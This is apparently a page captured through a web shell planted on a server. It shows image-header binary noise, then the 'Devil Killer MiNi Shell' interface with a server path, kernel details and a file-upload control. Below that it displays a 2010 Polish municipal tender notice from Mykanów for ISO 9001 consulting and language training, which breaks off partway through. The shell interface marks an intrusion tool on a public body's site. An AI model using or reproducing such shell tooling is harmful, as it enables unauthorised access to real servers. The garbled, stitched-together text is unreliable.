JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/205944-N-2010.html

<p class="kh_header"><b>Mykanów: usługi doradczo-szkoleniowe obejmujące wdrożenie systemu zarządzania jakością zgodnego z ISO 9001- 2 zadania</b><br>
<b>Numer ogłoszenia: 205944 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mykanów , ul. Samorządowa 1, 42-233 Mykanów, woj. śląskie, tel. 034 3288019, faks 034 3288019 w. 32.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi doradczo-szkoleniowe obejmujące wdrożenie systemu zarządzania jakością zgodnego z ISO 9001- 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: wdrożenie Systemu   Zarządzania Jakością  zgodnego z ISO 9001 w Urzędzie Gminy Mykanów
Przedmiot zamówienia obejmuje wdrożenie Systemu Zarządzania Jakością zgodnego z ISO 9001 w Urzędzie Gminy  Mykanów, obejmujące usługę doradczą oraz usługę szkoleniową w ramach projektu :Stawiamy na Jakość i doświadczenie - Urząd Gminy w Mykanowie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Modernizacja zarządzania w administracji publicznej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej):
Wykonanie usługi doradczo szkoleniowej dla  JST w wymiarze 224 godzin doradztwa w zakresie wdrożenia Systemu Zarządzania Jakością (SZJ) zgodnego z ISO 9001 wg tabeli poniżej
Zadanie 2: przeprowadzenie szkoleń językowych dla pracowników Urzędu Gminy
Przeprowadzenie szkoleń językowych  z zastosowaniem metod mieszanych (szkolenie stacjonarne plus e-learning) oraz szkolenia wprowadzającego motywującego do nauki języków i wskazującego na konieczność  ich doskonalenia. Szkolenia mają się odbyć w 2 grupach razem 18 osób w formule blended learning w tym 8 h motywowania do nauki,8h obsługa platformy e-learningowej, 48 godzin zajęć stacjonarnych, 108h szkoleń e-learningowych, 180h konwersacji indywidualnych.
Warunki szkoleń:
1.	Wykonawca zapewnieni catering (kawa, herbata, ciastka, ) na wszystkich szkoleniach 
         stacjonarnych
2.	Szkolenia będą odbywać się w siedzibie  Urzędu.
3.	Wykonawca ponosi koszty zakwaterowania, wyżywienia trenerów i inne koszty związane z pracą trenera.
4.	Dostosowanie szkoleń do specyfiki funkcjonowania administracji samorządowej.
5.	Umieszczenie emblematów Europejskiego Funduszu Społecznego i Programu Operacyjnego Kapitał Ludzki na wszystkich stronach materiałów szkoleniowych oraz Zaświadczeniach ukończenia szkolenia.
6.	Przekazanie Zamawiającemu na 2 tygodnie przed każdym szkoleniem zakresu merytorycznego szkolenia, planu szkolenia wraz z celem i zakładanym efektem.
7.	Przekazanie każdemu uczestnikowi drukowanych materiałów szkoleniowych na wszystkich szkoleniach. Za druk materiałów odpowiedzialny jest Wykonawca.
8.	Przeprowadzenie ankiety ewaluacyjnej na początku oraz na końcu każdego szkolenia i przekazanie jej Zamawiającemu.
9.	Zamawiający nie wymaga , aby przy realizacji zamówienia w danym szkoleniu czy realizacji innego elementu uczestniczyło  równocześnie 2 trenerów czy szkoleniowców.
Procedury poufności
Wykonawca zachowa poufność informacji i danych osobowych uzyskanych w trakcie realizacji zamówienia u uczestników projektu.

CPV 79410000-1  usługi doradcze w zakresie działalności gospodarczej i zarządzania
         79632000-3 szkolenie pracowników.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-1, 79.63.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie 
                  wymaga posiadania specjalnych uprawnień - dotyczy zadania 1 i 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadanie 1: Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia  
                          poprzez wykonanie z należytą starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 3 skutecznych ( potwierdzonych uzyskaniem przez daną jednostkę certyfikatu zgodności Systemu Zarządzania Jakością ISO 9001 ) usług doradczych w zakresie  wdrożeń Systemu Zarządzania Jakością ISO 9001  w jednostkach administracji publicznej, poświadczonych dokumentami potwierdzającymi należyte wykonanie usług ( np. referencje);
oraz  organizacji i przeprowadzenia  z należytą starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 3 szkoleń  z zakresu wymagań normy ISO 9001 w jednostkach administracji publicznej poświadczonych dokumentami potwierdzającymi należyte wykonanie usług ( np. referencje);
Dla Zadania 2: wykonania z należytą starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie:
a)  co najmniej 3szkoleń  w których jednym z elementów było kontrolowanie na  platformie e -learningowej  postępów w nauce uczestników  szkolenia
b) przeszkolenie co najmniej 30 osób w zakresu nauki języka angielskiego na platformie e-learningowej wraz z konwersacjami indywidualnymi przy pomocy komunikatora internetowego
c)przeprowadzenie dla co najmniej 30 osób szkolenia zawierającego na platformie e -learningowej następujące ćwiczenia interaktywne jak: nagrania lektorów , cwiczenia gramatyczne, pisanie ze słuchu , nauka słówek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
            a)  dysponuje  min. 2 osoby personelu wdrożeniowego, składającego się z pracujących  konsultantów , spełniających następujące wymagania:

           -wykształcenie wyższe,

            -Przynajmniej jedna ze wskazanych w pkt 8.1.3.a osób powinna posiadać   doświadczenie wdrożeniowe z zakresu ISO 9001 w jednostce administracji publicznej oraz ukończony kurs auditora wewnętrznego systemu zarządzania jakością wg ISO 9001 

- przynajmniej jedna ze wskazanych w pkt. 8.1.3 a osób powinna posiadać doświadczenie w skutecznej realizacji usług doradczych (potwierdzonych uzyskaniem przez jednostkę certyfikatu zgodności Systemu Zarządzania Jakością z normą ISO 9001) w zakresie wdrożeń Systemu Zarządzania Jakością zgodnego z wymaganiami normy ISO 9001, w co najmniej 3 jednostkach administracji publicznej.
b) dysponuje zespołem  co najmniej 2 osób personelu szkoleniowego (trenerów), spełniających następujące wymagania:
-     wykształcenie wyższe,
-  każda z osób wchodzących w skład zespołu, o którym mowa w pkt. 8.1.3.b, powinna legitymować się  doświadczeniem w postaci przeprowadzenia w jednostkach administracji publicznej nie mniej niż 3 szkoleń z zakresu wymagań normy ISO 9001.

 Zadanie 2 
Dysponuje  co najmniej 2 osobami  personelu szkoleniowego (trenerów), spełniających następujące wymagania:
-         wykształcenie wyższe ,
-  każda z osób wchodzących w skład zespołu, o którym mowa w pkt. 8.1.3.b, powinna legitymować się  doświadczeniem w postaci przeprowadzenia co najmniej 5 szkoleń w zakresie nauki języka angielskiego dla grup co najmniej 5 osobowych  każda oraz przeszkolenie co najmniej 30 osób z zakresu nauki języka angielskiego na platformie e - learningowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować sytuację ekonomiczną i finansową tj posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  zgodnej z przedmiotem zamówienia o wartości nie mniejszej niż
 25 000 PLN dla każdego zadania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu ,potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go a nimi stosunków Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
) pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANY DO UMOWY (dotyczy wszystkich umów):

1. Zmiana sposobu rozliczania umowy, lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu, lub wytycznych dotyczących realizacji projektu.  
2. W przypadku nowelizacji normy PN-N ISO 9001 na szkoleniach i przy wdrażaniu będą obowiązywały nowe wymagania.
3. W sytuacji zmiany terminów realizacji umowy.
4. W sytuacji zmniejszenia zakresu czynności objętego umową z jednoczesnym zmniejszeniem wynagrodzenia z tego tytułu.
5. W sytuacji zmiany osób wyznaczonych do realizacji zadania (wykonania określonych części zamówienia) przez Wykonawcę.
6. W sytuacji gdy w czasie obowiązywania umowy nastąpi zmiana przepisów prawa podatkowego, Wykonawca doliczy do wynagrodzenia netto podatek VAT, zgodnie z przepisami obowiązującymi w dniu wystawienia stosownych dokumentów finansowych/faktur VAT. Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. 
7. W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy  i mających charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej na celu wybór Wykonawcy nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą procedurą.  
Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian. 

Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.

Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności za zgodą obu stron.

Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2007r. nr 223, poz.1655 ze zmianami) i art.140 ust. 3 stanowiącego, że umowa podlega unieważnieniu  w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji  Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mykanow.4bip.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
w Mykanowie
42-233 Mykanów
ul. Samorządowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 11:00, miejsce: Urząd Gminy w Mykanowie
42-233 Mykanów
ul. Samorządowa 1
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego ( Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2.Modernizacja zarządzania w administracji publicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wdrożenie Systemu   Zarządzania Jakością  zgodnego z ISO 9001 w Urzędzie Gminy Mykanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wdrożenie Systemu Zarządzania Jakością zgodnego z ISO 9001 w Urzędzie Gminy  Mykanów, obejmujące usługę doradczą oraz usługę szkoleniową w ramach projektu Stawiamy na Jakość i doświadczenie - Urząd Gminy w Mykanowie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Działanie 5.2. Modernizacja zarządzania w administracji publicznej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej):
Wykonanie usługi doradczo szkoleniowej dla  JST w wymiarze 224 godzin doradztwa w zakresie wdrożenia Systemu Zarządzania Jakością (SZJ) zgodnego z ISO 9001 wg tabeli poniżej
Etap 
	Termin realizacji	Zakres i ilość godzin 
I. Audit wstępny i raport z auditu  wstępnego	Od dnia podpisania umowy -
20 sierpnia 2010 r.	- przeprowadzenie diagnozy istniejącego systemu zarządzania zakończonej opracowaniem raportu z auditu wewnętrznego wraz
z określeniem zakresu Systemu Zarządzania Jakością i wymaganej dokumentacji; 
- analiza zakresów obowiązków, odpowiedzialności i uprawnień pracowników oraz analiza funkcjonującej dokumentacji - łacznie 16 godzin

II. Sporządzenie wstępnej listy dokumentacji Systemu Zarządzania Jakością 
	Od dnia podpisania umowy  -
31 sierpnia  2010 r.	8 godzin
III. Sporządzenie Polityki Jakości dla Urzędu	Od dnia podpisania umowy  -
31 sierpnia 2010 r.	8 godzin
IV. Szkolenia dla pracowników w zakresie systemu zarządzania jakością :
-stacjonarne
-na platformie e-lerningowej( on-line)	Od dnia podpisania umowy.-30 września 2010 r.	-  szkolenia stacjonarne niezbędne dla wdrożenia Systemu Zarządzania Jakością ISO 9001 dla wszystkich pracowników jednostki (38 osób) w godzinach pracy urzędu wraz z dostarczeniem materiałów szkoleniowych i zaświadczeń dla wszystkich pracowników ;
-szkolenia na platformie e- learningowej, z podziałem szkoleń dla kierowników oraz pozostałych pracowników (zagwarantowany bezpłatny dostęp do platformy na co najmniej dwa lata od otrzymania certyfikatu zgodnego z normą ISO 9001 wydanego przez niezależną jednostkę certyfikującą);
Łącznie 24 godziny
V. Dokumentowanie Systemu Zarządzania Jakością	01 września 2010 r. -20 grudnia 2010 r.
	- współpraca z wyznaczonymi pracownikami UG w zakresie budowy Systemu Zarządzania Jakością oraz przy opracowaniu projektów dokumentacji Systemu Zarządzania Jakością 
w pełnym odniesieniu do standardu ISO 9001tj. księgi jakości, procedur wymaganych normą oraz standardów realizowanych procesów (sposoby postępowania) wraz z koniecznymi instrukcjami i formularzami (udział czynny konsultantów) w godzinach pracy urzędu;
Łacznie 80 godzin
VI. Wdrożenie dokumentacji Systemu Zarządzania Jakością	01 listopada 2010 r.-
31 stycznia  2011 r.
	weryfikacja i zatwierdzenie dokumentacji przez kierownictwo urzędu;
łącznie 32 godziny
VII. Powołanie auditorów wewnętrznych i ich szkolenie	01 stycznia 2011 r. - 28 luty 2011 r.
	24 godziny
VIII. Przeprowadzenie auditu wewnętrznego	01 lutego 2011 r.
- 31 marca 2011 r. 
	- zaplanowanie wraz z powołanymi przedstawicielami kierownictwa auditów wewnętrznych oraz przeprowadzenie wspólnie
z powołanymi i przeszkolonymi auditorami wewnętrznymi pierwszej serii auditów wewnętrznych ( udział konsultantów w auditach wewnętrznych) oraz wspólne opracowanie wzorcowych raportów z auditów;
- udział w zaplanowaniu  działań korekcyjnych, korygujących i zapobiegawczych po pierwszej serii auditów wewnętrznych;
- pomoc w zakresie działań korygujących;
- przygotowanie i udział w pierwszym przeglądzie zarządzania,
- przygotowanie do certyfikacji.
Łącznie 32 godziny
Certyfikat Systemu Zarządzania Jakością zgodny z normą ISO 9001 wyda niezależna jednostka certyfikująca w miesiącu maju 2011 r.   
 Wykonawca musi być właścicielem platformy lub posiadać umowę na korzystanie z niej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.41.00.00-1, 79.63.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przeprowadzenie szkoleń językowych dla pracowników Urzędu Gminy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń językowych  z zastosowaniem metod mieszanych (szkolenie stacjonarne plus e-learning) oraz szkolenia wprowadzającego motywującego do nauki języków i wskazującego na konieczność  ich doskonalenia. Szkolenia mają się odbyć w 2 grupach razem 18 osób w formule blended learning w tym 8 h motywowania do nauki,8h obsługa platformy e-learningowej, 48 godzin zajęć stacjonarnych, 108h szkoleń e-learningowych, 180h konwersacji indywidualnych.
